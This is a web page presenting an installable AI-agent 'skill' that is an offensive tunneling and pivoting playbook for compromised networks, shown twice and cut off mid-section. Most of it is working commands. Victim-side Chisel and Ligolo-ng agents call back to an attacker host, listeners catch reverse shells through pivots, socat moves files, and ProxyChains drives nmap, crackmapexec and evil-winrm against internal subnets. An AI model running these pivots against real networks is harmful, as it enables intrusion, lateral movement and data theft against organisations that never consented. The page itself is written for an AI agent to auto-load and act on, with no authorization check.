/tunneling-and-pivoting
Tunneling and pivoting playbook. Use when establishing network tunnels through compromised hosts including SSH tunneling, Chisel, Ligolo-ng, socat, DNS/ICMP/HTTP tunneling, ProxyChains, and multi-layer pivoting strategies.
$ npx -y skills add yaklang/hack-skills --skill tunneling-and-pivoting --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
- Fires itselfAuto-invocation. Claude auto-loads it when your prompt matches the work.Auto-invocation is when the right skill fires by itself at the right moment, driven by a FLOW.md router and a hook, instead of you invoking it by name. It is the difference between a skill being installed and a skill actually getting used.Read the full definition →
- You can call itInvoke it directly when you want it.
- Slash command
/tunneling-and-pivoting
Context preview
The summary Claude sees to decide when to auto-load this skill.
Tunneling and pivoting playbook. Use when establishing network tunnels through compromised hosts including SSH tunneling, Chisel, Ligolo-ng, socat, DNS/ICMP/HTTP tunneling, ProxyChains, and multi-layer pivoting strategies.
SKILL.md
tunneling-and-pivoting.SKILL.mdname: tunneling-and-pivoting
description: >-
Tunneling and pivoting playbook. Use when establishing network tunnels through compromised hosts including SSH tunneling, Chisel, Ligolo-ng, socat, DNS/ICMP/HTTP tunneling, ProxyChains, and multi-layer pivoting strategies.
SKILL: Tunneling & Pivoting — Expert Attack Playbook
> **AI LOAD INSTRUCTION**: Expert tunneling and pivoting techniques. Covers SSH port forwarding (local/remote/dynamic/jump), Chisel reverse SOCKS, Ligolo-ng transparent TUN pivoting, socat relays, DNS/ICMP/HTTP tunneling, ProxyChains configuration, Windows pivoting (netsh/plink), and multi-layer chaining. Base models miss egress-aware tool selection and transparent routing setup.
0. RELATED ROUTING
Before going deep, consider loading:
- [network-protocol-attacks](../network-protocol-attacks/SKILL.md) for network-level attacks from pivot positions
- [reverse-shell-techniques](../reverse-shell-techniques/SKILL.md) for establishing initial access shells
- [unauthorized-access-common-services](../unauthorized-access-common-services/SKILL.md) for exploiting services discovered through pivots
- [linux-privilege-escalation](../linux-privilege-escalation/SKILL.md) or [windows-privilege-escalation](../windows-privilege-escalation/SKILL.md) after pivoting to new hosts
---
1. SSH TUNNELING
Local Port Forward
Forward a local port to a remote service through the pivot.
# Access INTERNAL_HOST:3306 via localhost:3306
ssh -L 3306:INTERNAL_HOST:3306 user@PIVOT -N
# Access internal web app
ssh -L 8080:10.10.10.100:80 user@PIVOT -N
# Browse: http://localhost:8080
# Bind to all interfaces (share with teammates)
ssh -L 0.0.0.0:8080:INTERNAL:80 user@PIVOT -N
Remote Port Forward
Expose a local service to the pivot host's network.
# Make attacker's port 8000 accessible on pivot as pivot:9000
ssh -R 9000:127.0.0.1:8000 user@PIVOT -N
# Expose attacker's listener to internal network
ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT -N
# Internal hosts connect to PIVOT:4444 → reaches attacker:4444
Dynamic Port Forward (SOCKS Proxy)
# Create SOCKS4/5 proxy on localhost:1080
ssh -D 1080 user@PIVOT -N
# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
proxychains nmap -sT -Pn -p 80,443,445 INTERNAL_SUBNET/24
# Or with browser SOCKS proxy → browse internal web apps
Jump Host (ProxyJump)
# Single jump
ssh -J jumphost user@TARGET
# Multiple jumps
ssh -J jump1,jump2 user@TARGET
# SSH config for persistent jump
# ~/.ssh/config
Host internal-target
HostName 10.10.10.100
User admin
ProxyJump user@jumphost.example.com---
2. CHISEL
Reverse SOCKS Proxy (Most Common)
# Attacker: start chisel server
chisel server --reverse --port 8080
# Victim: connect back as client, create reverse SOCKS
chisel client ATTACKER_IP:8080 R:socks
# Result: SOCKS5 proxy on attacker's 127.0.0.1:1080
proxychains nmap -sT -Pn INTERNAL/24
Port Forwarding
# Forward specific port
chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306
# Multiple forwards
chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80
# Reverse port forward (expose attacker service to victim network)
chisel client ATTACKER:8080 R:0.0.0.0:4444:127.0.0.1:4444
---
3. LIGOLO-NG
TUN interface-based pivoting — transparent routing without SOCKS.
# Attacker: start proxy
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert -laddr 0.0.0.0:11601
# Agent (victim): connect to proxy
ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert
# In ligolo-proxy console:
>> session # select agent session
>> ifconfig # view agent's network interfaces
>> start # start tunnel
# Add routes on attacker to reach internal networks
sudo ip route add 10.10.10.0/24 dev ligolo
sudo ip route add 172.16.0.0/16 dev ligolo
Listener (Reverse Shell Catcher Through Pivot)
# In ligolo-proxy console:
>> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
# Internal hosts connecting to AGENT:4444 → forwarded to attacker:4444
Double Pivot
# Agent 1 on DMZ → tunnel to internal network 1
# Agent 2 on internal network 1 → tunnel to internal network 2
# Add routes for both networks on attacker
sudo ip route add 10.0.0.0/24 dev ligolo # via agent 1
sudo ip route add 172.16.0.0/24 dev ligolo # via agent 2
---
4. SOCAT
# TCP port forward
socat TCP-LISTEN:8080,fork TCP:INTERNAL:80
# UDP relay
socat UDP-LISTEN:53,fork UDP:INTERNAL_DNS:53
# Encrypted tunnel
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:INTERNAL:80
# File transfer via socat
# Receiver:
socat TCP-LISTEN:9999,fork file:received_file,create
# Sender:
socat TCP:RECEIVER:9999 file:send_file
---
5. PROXYCHAINS / PROXIFIER
ProxyChains Configuration
# /etc/proxychains4.conf
strict_chain # fail if any proxy is down
# dynamic_chain # skip dead proxies
# random_chain # randomize proxy order
[ProxyList]
socks5 127.0.0.1 1080 # first hop (SSH dynamic forward)
socks5 127.0.0.1 1081 # second hop (if chaining)
# Usage
proxychains nmap -sT -Pn -p 22,80,445 10.10.10.0/24
proxychains crackmapexec smb 10.10.10.0/24
proxychains evil-winrm -i 10.10.10.50 -u admin -p pass
---
6. WINDOWS PIVOTING
Netsh Port Forwarding
:: Forward port (requires admin)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP
:: List forwards
netsh interface portproxy show all
:: Remove
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
Plink (PuTTY CLI)
:: Dynamic SOCKS (like ssh -D)
plink.exe -ssh -D 1080 -N user@ATTACKER
:: Remote port forward
plink.exe -ssh -R 4444:127.0.0.1:4444 user@ATTACKER
:: Automated (non-inter
Read more
name: tunneling-and-pivoting description: >- Tunneling and pivoting playbook. Use when establishing network tunnels through compromised hosts including SSH tunneling, Chisel, Ligolo-ng, socat, DNS/ICMP/HTTP tunneling, ProxyChains, and multi-layer pivoting strategies.
SKILL: Tunneling & Pivoting — Expert Attack Playbook
> **AI LOAD INSTRUCTION**: Expert tunneling and pivoting techniques. Covers SSH port forwarding (local/remote/dynamic/jump), Chisel reverse SOCKS, Ligolo-ng transparent TUN pivoting, socat relays, DNS/ICMP/HTTP tunneling, ProxyChains configuration, Windows pivoting (netsh/plink), and multi-layer chaining. Base models miss egress-aware tool selection and transparent routing setup.
0. RELATED ROUTING
Before going deep, consider loading:
- [network-protocol-attacks](../network-protocol-attacks/SKILL.md) for network-level attacks from pivot positions
- [reverse-shell-techniques](../reverse-shell-techniques/SKILL.md) for establishing initial access shells
- [unauthorized-access-common-services](../unauthorized-access-common-services/SKILL.md) for exploiting services discovered through pivots
- [linux-privilege-escalation](../linux-privilege-escalation/SKILL.md) or [windows-privilege-escalation](../windows-privilege-escalation/SKILL.md) after pivoting to new hosts
---
1. SSH TUNNELING
Local Port Forward
Forward a local port to a remote service through the pivot.
# Access INTERNAL_HOST:3306 via localhost:3306 ssh -L 3306:INTERNAL_HOST:3306 user@PIVOT -N # Access internal web app ssh -L 8080:10.10.10.100:80 user@PIVOT -N # Browse: http://localhost:8080 # Bind to all interfaces (share with teammates) ssh -L 0.0.0.0:8080:INTERNAL:80 user@PIVOT -N
Remote Port Forward
Expose a local service to the pivot host's network.
# Make attacker's port 8000 accessible on pivot as pivot:9000 ssh -R 9000:127.0.0.1:8000 user@PIVOT -N # Expose attacker's listener to internal network ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT -N # Internal hosts connect to PIVOT:4444 → reaches attacker:4444
Dynamic Port Forward (SOCKS Proxy)
# Create SOCKS4/5 proxy on localhost:1080 ssh -D 1080 user@PIVOT -N # Use with proxychains echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf proxychains nmap -sT -Pn -p 80,443,445 INTERNAL_SUBNET/24 # Or with browser SOCKS proxy → browse internal web apps
Jump Host (ProxyJump)
# Single jump
ssh -J jumphost user@TARGET
# Multiple jumps
ssh -J jump1,jump2 user@TARGET
# SSH config for persistent jump
# ~/.ssh/config
Host internal-target
HostName 10.10.10.100
User admin
ProxyJump user@jumphost.example.com---
2. CHISEL
Reverse SOCKS Proxy (Most Common)
# Attacker: start chisel server chisel server --reverse --port 8080 # Victim: connect back as client, create reverse SOCKS chisel client ATTACKER_IP:8080 R:socks # Result: SOCKS5 proxy on attacker's 127.0.0.1:1080 proxychains nmap -sT -Pn INTERNAL/24
Port Forwarding
# Forward specific port chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306 # Multiple forwards chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80 # Reverse port forward (expose attacker service to victim network) chisel client ATTACKER:8080 R:0.0.0.0:4444:127.0.0.1:4444
---
3. LIGOLO-NG
TUN interface-based pivoting — transparent routing without SOCKS.
# Attacker: start proxy sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ligolo-proxy -selfcert -laddr 0.0.0.0:11601 # Agent (victim): connect to proxy ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert # In ligolo-proxy console: >> session # select agent session >> ifconfig # view agent's network interfaces >> start # start tunnel # Add routes on attacker to reach internal networks sudo ip route add 10.10.10.0/24 dev ligolo sudo ip route add 172.16.0.0/16 dev ligolo
Listener (Reverse Shell Catcher Through Pivot)
# In ligolo-proxy console: >> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp # Internal hosts connecting to AGENT:4444 → forwarded to attacker:4444
Double Pivot
# Agent 1 on DMZ → tunnel to internal network 1 # Agent 2 on internal network 1 → tunnel to internal network 2 # Add routes for both networks on attacker sudo ip route add 10.0.0.0/24 dev ligolo # via agent 1 sudo ip route add 172.16.0.0/24 dev ligolo # via agent 2
---
4. SOCAT
# TCP port forward socat TCP-LISTEN:8080,fork TCP:INTERNAL:80 # UDP relay socat UDP-LISTEN:53,fork UDP:INTERNAL_DNS:53 # Encrypted tunnel socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:INTERNAL:80 # File transfer via socat # Receiver: socat TCP-LISTEN:9999,fork file:received_file,create # Sender: socat TCP:RECEIVER:9999 file:send_file
---
5. PROXYCHAINS / PROXIFIER
ProxyChains Configuration
# /etc/proxychains4.conf strict_chain # fail if any proxy is down # dynamic_chain # skip dead proxies # random_chain # randomize proxy order [ProxyList] socks5 127.0.0.1 1080 # first hop (SSH dynamic forward) socks5 127.0.0.1 1081 # second hop (if chaining)
# Usage proxychains nmap -sT -Pn -p 22,80,445 10.10.10.0/24 proxychains crackmapexec smb 10.10.10.0/24 proxychains evil-winrm -i 10.10.10.50 -u admin -p pass
---
6. WINDOWS PIVOTING
Netsh Port Forwarding
:: Forward port (requires admin) netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP :: List forwards netsh interface portproxy show all :: Remove netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
Plink (PuTTY CLI)
:: Dynamic SOCKS (like ssh -D) plink.exe -ssh -D 1080 -N user@ATTACKER :: Remote port forward plink.exe -ssh -R 4444:127.0.0.1:4444 user@ATTACKER :: Automated (non-inter
Master Entry → Category Entries → Deep Topic Skills One master entry, six category entries, and 101 deep topic skills across 14 security domains.
Repo: yaklang/hack-skills
Other skills on hack-skills.
- /401-403-bypass-techniques
401/403 bypass playbook. Use when encountering access-denied responses on admin panels, API endpoints, or restricted paths. Covers path manipulation, HTTP method tampering, header injection, protocol downgrade, and automated bypass tools.
Open skill - /active-directory-acl-abuse
Active Directory ACL abuse playbook. Use when exploiting misconfigured AD permissions including GenericAll, WriteDACL, DCSync rights, shadow credentials, LAPS reading, GPO abuse, and BloodHound-guided attack paths.
Open skill - /active-directory-certificate-services
AD Certificate Services attack playbook. Use when targeting misconfigured AD CS for privilege escalation via ESC1-ESC13 template abuse, NTLM relay to enrollment, CA officer abuse, and certificate-based persistence.
Open skill - /active-directory-kerberos-attacks
Kerberos attack playbook for Active Directory. Use when targeting AD authentication via AS-REP roasting, Kerberoasting, golden/silver/diamond tickets, delegation abuse, or pass-the-ticket attacks.
Open skill - /ai-ml-security
AI/ML security playbook. Use when assessing model supply chain attacks (pickle RCE, poisoned weights), adversarial examples, model poisoning, model stealing, data privacy attacks (membership inference, model inversion), and autonomous agent security risks.
Open skill - /android-pentesting-tricks
Android pentesting playbook. Use when testing Android applications for SSL pinning bypass, exported component abuse, WebView vulnerabilities, intent redirection, root detection bypass, tapjacking, and backup extraction during authorized mobile security assessments.
Open skill

